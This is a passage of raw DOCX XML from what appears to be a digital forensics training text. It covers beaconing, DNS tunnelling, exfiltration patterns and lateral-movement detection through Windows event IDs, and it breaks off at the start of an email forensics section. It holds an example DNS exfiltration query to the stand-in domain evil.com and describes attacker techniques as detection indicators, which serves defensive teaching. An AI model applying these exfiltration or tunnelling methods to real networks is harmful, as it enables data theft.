          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="90" w:line="290"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">HTTPS traffic with </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">self-signed or odd certificates</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, and unusual </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">User-Agent</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> strings.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="90" w:line="290"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Small, similar-sized requests and responses repeated over hours.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="90" w:line="290"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Use of common protocols (HTTP/S, DNS) so the traffic blends in.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80"/>
      </w:pP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rPr>
          <w:cantSplit w:val="false"/>
        </w:trP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 Beaconing pattern in time</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="70" w:line="260"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="222222"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">10:00 -&gt;  host -&gt; 203.0.113.10:443   (small packet)</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="70" w:line="260"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="222222"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">10:05 -&gt;  host -&gt; 203.0.113.10:443</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="70" w:line="260"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="222222"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">10:10 -&gt;  host -&gt; 203.0.113.10:443</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:line="260"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="222222"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">10:15 -&gt;  host -&gt; 203.0.113.10:443       &lt;- regular interval = suspicious</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="180"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:keepNext/>
        <w:spacing w:after="120" w:before="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0E7C7B"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">DNS tunnelling</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160" w:line="300"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">In </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">DNS tunnelling</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, data is hidden inside DNS queries and responses. The attacker controls a domain (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">evil.com</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">) and its name server. The malware sends stolen data as </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">encoded sub-domains</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — for example </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="7A1F1F"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">dGhpcyBpcyBhIHRlc3Q=.evil.com</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — and the attacker’s DNS server reads and answers them. DNS is rarely blocked, so this passes many firewalls.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="90" w:line="290"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">The sub-domain </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="7A1F1F"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">dGhpcyBpcyBhIHRlc3Q=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> is </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Base64</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> text. Decoding it gives </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="7A1F1F"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">this is a test</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — in a real case it would contain stolen data or commands.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="90" w:line="290"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Indicators: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">very long</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> or random-looking sub-domains (high entropy), huge numbers of queries to one domain, many unique sub-domains, unusual record types such as </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">TXT</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> or NULL, and DNS traffic volume far larger than normal.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:keepNext/>
        <w:spacing w:after="120" w:before="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0E7C7B"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Data exfiltration patterns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411"/>
        <w:gridCol w:w="6335"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
          <w:tblHeader/>
        </w:trPr>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Pattern</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="633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to look for</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="341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Large outbound transfers</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Unusual upload volume from a server or user, especially at night or weekends</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="341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Unusual destinations</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Cloud storage, file-sharing sites, personal email, unknown foreign IPs</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="341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Compression/encryption before sending</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ZIP/RAR/7z creation (prefetch, command history) followed by a transfer</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="341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Slow and low</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Small amounts over many days to stay below alert limits</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="341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Misused protocols</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inside DNS, ICMP, or HTTPS POST requests; FTP/SFTP to unknown servers</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="341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Removable media / email</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USB copy, email attachments with large size</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="180"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:keepNext/>
        <w:spacing w:after="120" w:before="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0E7C7B"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Lateral movement</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160" w:line="300"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Lateral movement</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> is when an attacker, after compromising one machine, moves to other machines in the network to reach valuable data or higher privileges. Common methods use legitimate tools and protocols: RDP, SMB/admin shares, PsExec, WMI, PowerShell remoting and stolen credentials (pass-the-hash).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="90" w:line="290"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Windows Event 4624</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> with Logon Type 3 or 10 from an unusual source workstation, and </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">4648</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (explicit credentials).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="90" w:line="290"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Administrator or service accounts logging on to many hosts within minutes.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="90" w:line="290"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">7045</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (service installed) or </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">4698</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (scheduled task) on remote machines.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="90" w:line="290"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Workstation-to-workstation SMB or RDP traffic — normally users talk to servers, not to each other.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="90" w:line="290"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">New SMB connections to admin shares (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="7A1F1F"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">ADMIN$</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C$</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">) in firewall/flow logs.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:keepNext/>
        <w:spacing w:after="120" w:before="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0E7C7B"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">NetworkMiner (passive analysis)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160" w:line="300"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">NetworkMiner</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> is a passive network forensic tool. You load a PCAP file and it automatically organises the data into </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">hosts</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (with operating-system guesses), </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">files</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images</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credentials</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DNS</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sessions</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">. It saves analysts time compared with reading raw packets, and the extracted files can be hashed and checked.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0E7C7B"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">■ Investigating suspicious communication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rPr>
          <w:cantSplit/>
        </w:trPr>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Wireshark: find suspicious traffic</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DNS analysis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NetworkMiner: extract hosts &amp; files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Splunk: correlate logs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Record IOCs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Static malware analysis</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="180"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:keepNext/>
        <w:spacing w:after="160" w:before="340"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F3864"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">4.6 Email Forensics</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160" w:line="300"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Email forensics</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> examines emails to find where a message came from, the path it travelled, and whether it is genuine. Email is a common route for phishing, fraud, harassment and malware, so it is part of many investigations.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:keepNext/>
        <w:spacing w:after="120" w:before="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0E7C7B"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Structure of an email</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="90" w:line="290"/>
      </w:pPr>
      <w:r>
